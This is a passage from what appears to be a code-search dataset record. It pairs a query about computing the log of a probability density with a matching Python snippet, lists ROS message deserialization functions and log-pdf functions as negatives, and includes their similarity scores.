(length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1 = str[start:end].decode('utf-8')\n else:\n val1 = str[start:end]\n self.planning_scene_diff.allowed_collision_matrix.link_names.append(val1)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.planning_scene_diff.allowed_collision_matrix.entries = []\n for i in range(0, length):\n val1 = arm_navigation_msgs.msg.AllowedCollisionEntry()\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sB'%length\n start = end\n end += struct.calcsize(pattern)\n val1.enabled = numpy.frombuffer(str[start:end], dtype=numpy.bool, count=length)\n val1.enabled = map(bool, val1.enabled)\n self.planning_scene_diff.allowed_collision_matrix.entries.append(val1)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.planning_scene_diff.allowed_contacts = []\n for i in range(0, length):\n val1 = arm_navigation_msgs.msg.AllowedContactSpecification()\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.name = str[start:end].decode('utf-8')\n else:\n val1.name = str[start:end]\n _v92 = val1.shape\n start = end\n end += 1\n (_v92.type,) = _struct_b.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n _v92.dimensions = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%si'%length\n start = end\n end += struct.calcsize(pattern)\n _v92.triangles = numpy.frombuffer(str[start:end], dtype=numpy.int32, count=length)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n _v92.vertices = []\n for i in range(0, length):\n val3 = geometry_msgs.msg.Point()\n _x = val3\n start = end\n end += 24\n (_x.x, _x.y, _x.z,) = _struct_3d.unpack(str[start:end])\n _v92.vertices.append(val3)\n _v93 = val1.pose_stamped\n _v94 = _v93.header\n start = end\n end += 4\n (_v94.seq,) = _struct_I.unpack(str[start:end])\n _v95 = _v94.stamp\n _x = _v95\n start = end\n end += 8\n (_x.secs, _x.nsecs,) = _struct_2I.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n _v94.frame_id = str[start:end].decode('utf-8')\n else:\n _v94.frame_id = str[start:end]\n _v96 = _v93.pose\n _v97 = _v96.position\n _x = _v97\n start = end\n end += 24\n (_x.x, _x.y, _x.z,) = _struct_3d.unpack(str[start:end])\n _v98 = _v96.orientation\n _x = _v98\n start = end\n end += 32\n (_x.x, _x.y, _x.z, _x.w,) = _struct_4d.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n val1.link_names = []\n for i in range(0, length):\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val2 = str[start:end].decode('utf-8')\n else:\n val2 = str[start:end]\n val1.link_names.append(val2)\n start = end\n end += 8\n (val1.penetration_depth,) = _struct_d.unpack(str[start:end])\n self.planning_scene_diff.allowed_contacts.append(val1)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.planning_scene_diff.link_padding = []\n for i in range(0, length):\n val1 = arm_navigation_msgs.msg.LinkPadding()\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.link_name = str[start:end].decode('utf-8')\n else:\n val1.link_name = str[start:end]\n start = end\n end += 8\n (val1.padding,) = _struct_d.unpack(str[start:end])\n self.planning_scene_diff.link_padding.append(val1)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.planning_scene_diff.collision_objects = []\n for i in range(0, length):\n val1 = arm_navigation_msgs.msg.CollisionObject()\n _v99 = val1.header\n start = end\n end += 4\n (_v99.seq,) = _struct_I.unpack(str[start:end])\n _v100 = _v99.stamp\n _x = _v100\n start = end\n end += 8\n (_x.secs, _x.nsecs,) = _struct_2I.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n _v99.frame_id = str[start:end].decode('utf-8')\n else:\n _v99.frame_id = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.id = str[start:end].decode('utf-8')\n else:\n val1.id = str[start:end]\n start = end\n end += 4\n (val1.padding,) = _struct_f.unpack(str[start:end])\n _v101 = val1.operation\n start = end\n end += 1\n (_v101.operation,) = _struct_b.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n val1.shapes = []\n for i in range(0, length):\n val2 = arm_navigation_msgs.msg.Shape()\n start = end\n end += 1\n (val2.type,) = _struct_b.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n val2.dimensions = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%si'%length\n start = end\n end += struct.calcsize(pattern)\n val2.triangles = numpy.frombuffer(str[start:end], dtype=numpy.int32, count=length)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n val2.vertices = []\n for i in range(0, length):\n val3 = geometry_msgs.msg.Point()\n _x = val3\n start = end\n end += 24\n (_x.x, _x.y, _x.z,) = _struct_3d.unpack(str[start:end])\n val2.vertices.append(val3)\n val1.shapes.append(val2)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n val1.poses = []\n for i in range(0, length):\n val2 = geometry_msgs.msg.Pose()\n _v102 = val2.position\n _x = _v102\n start = end\n end += 24\n (_x.x, _x.y, _x.z,) = _struct_3d.unpack(str[start:end])\n _v103 = val2.orientation\n _x = _v103\n start = end\n end += 32\n (_x.x, _x.y, _x.z, _x.w,) = _struct_4d.unpack(str[start:end])\n val1.poses.append(val2)\n self.planning_scene_diff.collision_objects.append(val1)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.planning_scene_diff.attached_collision_objects = []\n for i in range(0, length):\n val1 = arm_navigation_msgs.msg.AttachedCollisionObject()\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.link_name = str[start:end].decode('utf-8')\n else:\n val1.link_name = str[start:end]\n _v104 = val1.object\n _v105 = _v104.header\n start = end\n end += 4\n (_v105.seq,) = _struct_I.unpack(str[start:end])\n _v106 = _v105.stamp\n _x = _v106\n start = end\n end += 8\n (_x.secs, _x.nsecs,) = _struct_2I.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n _v105.frame_id = str[start:end].decode('utf-8')\n else:\n _v105.frame_id = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n _v104.id = str[start:end].decode('utf-8')\n else:\n _v104.id = str[start:end]\n start = end\n end += 4\n (_v104.padding,) = _struct_f.unpack(str[start:end])\n _v107 = _v104.operation\n start = end\n end += 1\n (_v107.operation,) = _struct_b.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n _v104.shapes = []\n for i in range(0, length):\n val3 = arm_navigation_msgs.msg.Shape()\n start = end\n end += 1\n (val3.type,) = _struct_b.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n val3.dimensions = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%si'%length\n start = end\n end += struct.calcsize(pattern)\n val3.triangles = numpy.frombuffer(str[start:end], dtype=numpy.int32, count=length)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n val3.vertices = []\n for i in range(0, length):\n val4 = geometry_msgs.msg.Point()\n _x = val4\n start = end\n end += 24\n (_x.x, _x.y, _x.z,) = _struct_3d.unpack(str[start:end])\n val3.vertices.append(val4)\n _v104.shapes.append(val3)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n _v104.poses = []\n for i in range(0, length):\n val3 = geometry_msgs.msg.Pose()\n _v108 = val3.position\n _x = _v108\n start = end\n end += 24\n (_x.x, _x.y, _x.z,) = _struct_3d.unpack(str[start:end])\n _v109 = val3.orientation\n _x = _v109\n start = end\n end += 32\n (_x.x, _x.y, _x.z, _x.w,) = _struct_4d.unpack(str[start:end])\n _v104.poses.append(val3)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n val1.touch_links = []\n for i in range(0, length):\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val2 = str[start:end].decode('utf-8')\n else:\n val2 = str[start:end]\n val1.touch_links.append(val2)\n self.planning_scene_diff.attached_collision_objects.append(val1)\n _x = self\n start = end\n end += 12\n (_x.planning_scene_diff.collision_map.header.seq, _x.planning_scene_diff.collision_map.header.stamp.secs, _x.planning_scene_diff.collision_map.header.stamp.nsecs,) = _struct_3I.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.planning_scene_diff.collision_map.header.frame_id = str[start:end].decode('utf-8')\n else:\n self.planning_scene_diff.collision_map.header.frame_id = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.planning_scene_diff.collision_map.boxes = []\n for i in range(0, length):\n val1 = arm_navigation_msgs.msg.OrientedBoundingBox()\n _v110 = val1.center\n _x = _v110\n start = end\n end += 12\n (_x.x, _x.y, _x.z,) = _struct_3f.unpack(str[start:end])\n _v111 = val1.extents\n _x = _v111\n start = end\n end += 12\n (_x.x, _x.y, _x.z,) = _struct_3f.unpack(str[start:end])\n _v112 = val1.axis\n _x = _v112\n start = end\n end += 12\n (_x.x, _x.y, _x.z,) = _struct_3f.unpack(str[start:end])\n start = end\n end += 4\n (val1.angle,) = _struct_f.unpack(str[start:end])\n self.planning_scene_diff.collision_map.boxes.append(val1)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.operations.collision_operations = []\n for i in range(0, length):\n val1 = arm_navigation_msgs.msg.CollisionOperation()\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.object1 = str[start:end].decode('utf-8')\n else:\n val1.object1 = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.object2 = str[start:end].decode('utf-8')\n else:\n val1.object2 = str[start:end]\n _x = val1\n start = end\n end += 12\n (_x.penetration_distance, _x.operation,) = _struct_di.unpack(str[start:end])\n self.operations.collision_operations.append(val1)\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize_numpy(self, str, numpy):\n try:\n if self.plans is None:\n self.plans = None\n end = 0\n start = end\n end += 1\n (self.error,) = _get_struct_b().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sf'%length\n start = end\n end += struct.calcsize(pattern)\n self.start_pos = numpy.frombuffer(str[start:end], dtype=numpy.float32, count=length)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sf'%length\n start = end\n end += struct.calcsize(pattern)\n self.target_pos = numpy.frombuffer(str[start:end], dtype=numpy.float32, count=length)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.plans = []\n for i in range(0, length):\n val1 = poppy_torso_control.msg.Trajectory()\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.joint = str[start:end].decode('utf-8')\n else:\n val1.joint = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sf'%length\n start = end\n end += struct.calcsize(pattern)\n val1.trajectory = numpy.frombuffer(str[start:end], dtype=numpy.float32, count=length)\n self.plans.append(val1)\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize(self, str):\n try:\n if self.pose is None:\n self.pose = geometry_msgs.msg.PoseWithCovariance()\n end = 0\n _x = self\n start = end\n end += 72\n (_x.detection_id, _x.confidence, _x.pose.pose.position.x, _x.pose.pose.position.y, _x.pose.pose.position.z, _x.pose.pose.orientation.x, _x.pose.pose.orientation.y, _x.pose.pose.orientation.z, _x.pose.pose.orientation.w,) = _get_struct_Q8d().unpack(str[start:end])\n start = end\n end += 288\n self.pose.covariance = _get_struct_36d().unpack(str[start:end])\n _x = self\n start = end\n end += 40\n (_x.height, _x.bbox_x, _x.bbox_y, _x.bbox_w, _x.bbox_h,) = _get_struct_5d().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.modality = str[start:end].decode('utf-8')\n else:\n self.modality = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sf'%length\n start = end\n end += struct.calcsize(pattern)\n self.embed_vector = struct.unpack(pattern, str[start:end])\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize(self, str):\n try:\n if self.model_aligned is None:\n self.model_aligned = articulation_msgs.msg.ModelMsg()\n if self.data_aligned is None:\n self.data_aligned = articulation_msgs.msg.ModelMsg()\n end = 0\n _x = self\n start = end\n end += 12\n (_x.model_aligned.header.seq, _x.model_aligned.header.stamp.secs, _x.model_aligned.header.stamp.nsecs,) = _struct_3I.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.model_aligned.header.frame_id = str[start:end].decode('utf-8')\n else:\n self.model_aligned.header.frame_id = str[start:end]\n start = end\n end += 4\n (self.model_aligned.id,) = _struct_i.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.model_aligned.name = str[start:end].decode('utf-8')\n else:\n self.model_aligned.name = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.model_aligned.params = []\n for i in range(0, length):\n val1 = articulation_msgs.msg.ParamMsg()\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.name = str[start:end].decode('utf-8')\n else:\n val1.name = str[start:end]\n _x = val1\n start = end\n end += 9\n (_x.value, _x.type,) = _struct_dB.unpack(str[start:end])\n self.model_aligned.params.append(val1)\n _x = self\n start = end\n end += 12\n (_x.model_aligned.track.header.seq, _x.model_aligned.track.header.stamp.secs, _x.model_aligned.track.header.stamp.nsecs,) = _struct_3I.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.model_aligned.track.header.frame_id = str[start:end].decode('utf-8')\n else:\n self.model_aligned.track.header.frame_id = str[start:end]\n start = end\n end += 4\n (self.model_aligned.track.id,) = _struct_i.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.model_aligned.track.pose = []\n for i in range(0, length):\n val1 = geometry_msgs.msg.Pose()\n _v71 = val1.position\n _x = _v71\n start = end\n end += 24\n (_x.x, _x.y, _x.z,) = _struct_3d.unpack(str[start:end])\n _v72 = val1.orientation\n _x = _v72\n start = end\n end += 32\n (_x.x, _x.y, _x.z, _x.w,) = _struct_4d.unpack(str[start:end])\n self.model_aligned.track.pose.append(val1)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.model_aligned.track.pose_headers = []\n for i in range(0, length):\n val1 = std_msgs.msg.Header()\n start = end\n end += 4\n (val1.seq,) = _struct_I.unpack(str[start:end])\n _v73 = val1.stamp\n _x = _v73\n start = end\n end += 8\n (_x.secs, _x.nsecs,) = _struct_2I.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.frame_id = str[start:end].decode('utf-8')\n else:\n val1.frame_id = str[start:end]\n self.model_aligned.track.pose_headers.append(val1)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.model_aligned.track.pose_projected = []\n for i in range(0, length):\n val1 = geometry_msgs.msg.Pose()\n _v74 = val1.position\n _x = _v74\n start = end\n end += 24\n (_x.x, _x.y, _x.z,) = _struct_3d.unpack(str[start:end])\n _v75 = val1.orientation\n _x = _v75\n start = end\n end += 32\n (_x.x, _x.y, _x.z, _x.w,) = _struct_4d.unpack(str[start:end])\n self.model_aligned.track.pose_projected.append(val1)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.model_aligned.track.pose_resampled = []\n for i in range(0, length):\n val1 = geometry_msgs.msg.Pose()\n _v76 = val1.position\n _x = _v76\n start = end\n end += 24\n (_x.x, _x.y, _x.z,) = _struct_3d.unpack(str[start:end])\n _v77 = val1.orientation\n _x = _v77\n start = end\n end += 32\n (_x.x, _x.y, _x.z, _x.w,) = _struct_4d.unpack(str[start:end])\n self.model_aligned.track.pose_resampled.append(val1)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sI'%length\n start = end\n end += struct.calcsize(pattern)\n self.model_aligned.track.pose_flags = struct.unpack(pattern, str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.model_aligned.track.channels = []\n for i in range(0, length):\n val1 = sensor_msgs.msg.ChannelFloat32()\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.name = str[start:end].decode('utf-8')\n else:\n val1.name = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sf'%length\n start = end\n end += struct.calcsize(pattern)\n val1.values = struct.unpack(pattern, str[start:end])\n self.model_aligned.track.channels.append(val1)\n _x = self\n start = end\n end += 12\n (_x.data_aligned.header.seq, _x.data_aligned.header.stamp.secs, _x.data_aligned.header.stamp.nsecs,) = _struct_3I.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.data_aligned.header.frame_id = str[start:end].decode('utf-8')\n else:\n self.data_aligned.header.frame_id = str[start:end]\n start = end\n end += 4\n (self.data_aligned.id,) = _struct_i.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.data_aligned.name = str[start:end].decode('utf-8')\n else:\n self.data_aligned.name = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.data_aligned.params = []\n for i in range(0, length):\n val1 = articulation_msgs.msg.ParamMsg()\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.name = str[start:end].decode('utf-8')\n else:\n val1.name = str[start:end]\n _x = val1\n start = end\n end += 9\n (_x.value, _x.type,) = _struct_dB.unpack(str[start:end])\n self.data_aligned.params.append(val1)\n _x = self\n start = end\n end += 12\n (_x.data_aligned.track.header.seq, _x.data_aligned.track.header.stamp.secs, _x.data_aligned.track.header.stamp.nsecs,) = _struct_3I.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.data_aligned.track.header.frame_id = str[start:end].decode('utf-8')\n else:\n self.data_aligned.track.header.frame_id = str[start:end]\n start = end\n end += 4\n (self.data_aligned.track.id,) = _struct_i.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.data_aligned.track.pose = []\n for i in range(0, length):\n val1 = geometry_msgs.msg.Pose()\n _v78 = val1.position\n _x = _v78\n start = end\n end += 24\n (_x.x, _x.y, _x.z,) = _struct_3d.unpack(str[start:end])\n _v79 = val1.orientation\n _x = _v79\n start = end\n end += 32\n (_x.x, _x.y, _x.z, _x.w,) = _struct_4d.unpack(str[start:end])\n self.data_aligned.track.pose.append(val1)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.data_aligned.track.pose_headers = []\n for i in range(0, length):\n val1 = std_msgs.msg.Header()\n start = end\n end += 4\n (val1.seq,) = _struct_I.unpack(str[start:end])\n _v80 = val1.stamp\n _x = _v80\n start = end\n end += 8\n (_x.secs, _x.nsecs,) = _struct_2I.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.frame_id = str[start:end].decode('utf-8')\n else:\n val1.frame_id = str[start:end]\n self.data_aligned.track.pose_headers.append(val1)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.data_aligned.track.pose_projected = []\n for i in range(0, length):\n val1 = geometry_msgs.msg.Pose()\n _v81 = val1.position\n _x = _v81\n start = end\n end += 24\n (_x.x, _x.y, _x.z,) = _struct_3d.unpack(str[start:end])\n _v82 = val1.orientation\n _x = _v82\n start = end\n end += 32\n (_x.x, _x.y, _x.z, _x.w,) = _struct_4d.unpack(str[start:end])\n self.data_aligned.track.pose_projected.append(val1)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.data_aligned.track.pose_resampled = []\n for i in range(0, length):\n val1 = geometry_msgs.msg.Pose()\n _v83 = val1.position\n _x = _v83\n start = end\n end += 24\n (_x.x, _x.y, _x.z,) = _struct_3d.unpack(str[start:end])\n _v84 = val1.orientation\n _x = _v84\n start = end\n end += 32\n (_x.x, _x.y, _x.z, _x.w,) = _struct_4d.unpack(str[start:end])\n self.data_aligned.track.pose_resampled.append(val1)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sI'%length\n start = end\n end += struct.calcsize(pattern)\n self.data_aligned.track.pose_flags = struct.unpack(pattern, str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.data_aligned.track.channels = []\n for i in range(0, length):\n val1 = sensor_msgs.msg.ChannelFloat32()\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.name = str[start:end].decode('utf-8')\n else:\n val1.name = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sf'%length\n start = end\n end += struct.calcsize(pattern)\n val1.values = struct.unpack(pattern, str[start:end])\n self.data_aligned.track.channels.append(val1)\n start = end\n end += 72\n self.R = _struct_9d.unpack(str[start:end])\n start = end\n end += 24\n self.T = _struct_3d.unpack(str[start:end])\n _x = self\n start = end\n end += 12\n (_x.dist_rot, _x.dist_trans,) = _struct_df.unpack(str[start:end])\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize(self, str):\n try:\n end = 0\n _x = self\n start = end\n end += 152\n (_x.tcp, _x.ori, _x.zone, _x.vacuum, _x.workx, _x.worky, _x.workz, _x.workq0, _x.workqx, _x.workqy, _x.workqz, _x.toolx, _x.tooly, _x.toolz, _x.toolq0, _x.toolqx, _x.toolqy, _x.toolqz, _x.ret,) = _struct_2d2q14dq.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.msg = str[start:end].decode('utf-8')\n else:\n self.msg = str[start:end]\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill" ]
[ "0.8090085", "0.79770607", "0.7917897", "0.7906423", "0.7893816", "0.78317606", "0.78120494", "0.7810609", "0.7784728", "0.77594984", "0.7740543", "0.77159595", "0.77151734", "0.7697443", "0.7693122", "0.768625", "0.76731443", "0.763944", "0.7637318", "0.7629651", "0.7625018", "0.76167494", "0.76013076", "0.75971913", "0.75914437", "0.75859106", "0.75817364", "0.75801873", "0.75619626", "0.75600266", "0.75444394", "0.75368154", "0.7525295", "0.75191957", "0.7517345", "0.7507071", "0.7502871", "0.7499238", "0.7487789", "0.7478959", "0.7476673", "0.74645644", "0.74641854", "0.7441971", "0.74342704", "0.74188226", "0.7416875", "0.7403989", "0.7377319", "0.737021", "0.7368503", "0.7358342", "0.7358342", "0.7358342", "0.73572576", "0.73286086", "0.73131585", "0.7290596", "0.7284919", "0.7283926", "0.72781026", "0.72714263", "0.7270591", "0.72631794", "0.7248612", "0.7244955", "0.72274274", "0.72190243", "0.7216247", "0.7214759", "0.72063154", "0.7202076", "0.7186582", "0.7178574", "0.7165593", "0.7157388", "0.7148532", "0.7144027", "0.7122354", "0.71135867", "0.7077558", "0.70640665", "0.7050577", "0.7027297", "0.70264053", "0.70147157", "0.7011933", "0.68382317", "0.68330246", "0.6831479", "0.6784365", "0.674763", "0.67266095", "0.67159694", "0.67115307", "0.6707256", "0.6696923", "0.6675813", "0.6667689", "0.66539884" ]
0.68092334
90
Compute the log function of the pdf for a fixed value on the support.
def log_pdf_at_x(x): return lambda point: gs.log( self.information_manifold.point_to_pdf(point)(x) )
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def logPdf(self,x):\n logPdf = np.log(self.pdf(x))\n return logPdf", "def logPdf(self,x):\n logPdf = np.log(self.pdf(x))\n return logPdf", "def log_pdf(self, x):\n if x < 0:\n raise Exception(\"input value x can't be a negative value!\")\n\n if self.is_fit:\n if x >= 0:\n return -np.log(np.math.factorial(x)) + \\\n x * np.log(self.alpha) - self.alpha\n else:\n return 0\n else:\n raise Exception(\"Distribution doesn't have all parameters set!\")", "def logpdf(self, x):\n if self.transform is not None:\n x = self.transform(x) \n return (-self.alpha-1)*np.log(x) - (self.beta/float(x))", "def log_pdf_derivative(x):\n return gs.autodiff.jacobian(log_pdf_at_x(x))(base_point)", "def logpdf(x, a, b):\n with mp.extradps(5):\n a, b = _validate_a_b(a, b)\n x = mp.mpf(x)\n if x < 0 or x > 1:\n return -mp.inf\n return (_fun.xlogy(a - 1, x) + _fun.xlog1py(b - 1, -x)\n - _fun.logbeta(a, b))", "def _evaluate_point_logpdf(args):\n x, data, cho_factor = args\n\n # Use Cholesky decomposition to avoid direct inversion of covariance matrix\n diff = data - x\n tdiff = la.cho_solve(cho_factor, diff.T, check_finite=False).T\n diff *= tdiff\n\n # Work in the log to avoid large numbers\n return logsumexp(-np.sum(diff, axis=1)/2.0)", "def logpdf(self, X) -> np.ndarray:\n return self.dist.logpdf(self.inv_trans(X))", "def log_pdf_impl(self, alpha, beta, random_variable, F=None):\n F = get_default_MXNet_mode() if F is None else F\n\n g_alpha = F.gammaln(alpha)\n p1 = (alpha - 1.) * F.log(random_variable)\n return (p1 - beta * random_variable) - (g_alpha - alpha * F.log(beta))", "def logpdf(self, point: np.ndarray) -> float:\n point = np.array(point)\n if point.size > 1:\n point = point.reshape((2, -1))\n parts = self._logp.T + np.reshape([rv.logpdf(point) for rv in self._rvs], (2, -1))\n return logsumexp(parts, axis=0)\n parts = self._logp + np.array([rv.logpdf(point) for rv in self._rvs])\n return logsumexp(parts)", "def logpdf(x, p, temperature):\n assert x.shape == p.shape\n tol = 1e-7\n p = np.clip(p, tol, 1 - tol)\n x = np.clip(x, tol, 1 - tol)\n logit_p = logit(p)\n first_term = np.log(temperature) + logit_p - (1 + temperature) * np.log(x) - (1 + temperature) * np.log(1 - x)\n second_term = 2 * np.log((np.exp(logit_p) * (x ** (- temperature))) + (1 - x) ** (- temperature))\n return first_term - second_term", "def conditional_logpdf(self, x1, x2 = None):\n f_x2 = self.unconditional_pdf_x2(x2)\n return self.joint_logpdf(x1, x2) - np.log(f_x2)", "def log_pdf(X, parameters):\n check_data_type_column_data(X)\n check_model_params_dict(parameters)\n\n sigma = (1.0/parameters['rho'])**.5\n\n return norm.logpdf(X,parameters['mu'],sigma)", "def logpdf(self, f, y, extra_data=None):\r\n link_f = self.gp_link.transf(f)\r\n return self.logpdf_link(link_f, y, extra_data=extra_data)", "def logpdf(self, X) -> np.ndarray:\n raise NotImplementedError", "def pdf(self, x, log = False):\n if log:\n return D.logsumexp(\n D.multiple_gauss_den(x, self.mu, self.va, log = True)\n + N.log(self.w))\n else:\n return N.sum(D.multiple_gauss_den(x, self.mu, self.va) * self.w, 1)", "def log_pdf_impl(self, mean, variance, random_variable, F=None):\n F = get_default_MXNet_mode() if F is None else F\n\n alpha, beta = self._get_alpha_beta(mean, variance)\n g_alpha = F.gammaln(alpha)\n p1 = (alpha - 1.) * F.log(random_variable)\n return (p1 - beta * random_variable) - (g_alpha - alpha * F.log(beta))", "def get_log(p):\n if p==0:\n return 0.\n return p*np.log2(p)", "def log_pdf_derivative_squared(x):\n dlog = log_pdf_derivative(x)\n return gs.einsum(\"...i, ...j -> ...ij\", dlog, dlog)", "def log_likelihood_function(self, instance) -> float:\n return self.prior.factor(instance[0])", "def logFactorial(value):\n if all([value > 0,abs(round(value) - value) < 0.000001,value <= 34]):\n return float(sum(np.log(range(1,int(value) + 1))))\n elif all([value > 0,abs(round(value) - value) < 0.000001,value > 34]):\n return float(value)*np.log(float(value)) - float(value) + \\\n 0.5*np.log(2.0*np.pi*float(value)) - 1.0/(12.0*float(value))\n elif value == 0:\n return float(0)\n else:\n return float('nan')", "def pdf(self,x):\n if self.base == 'natural':\n pdfValue = 1./(self.upperBound-self.lowerBound) * 1./x\n else:\n pdfValue = 1./(self.upperBound-self.lowerBound) * 1./x * 1./math.log(10.)\n return pdfValue", "def log_marg_like(self, gamma, gamma0, lamb, nu):\n return self.ppi_distribution(gamma, gamma0, lamb).logpdf(self.Y, precision_multiplier=nu)", "def logpdf(self, X) -> np.ndarray:\n if not 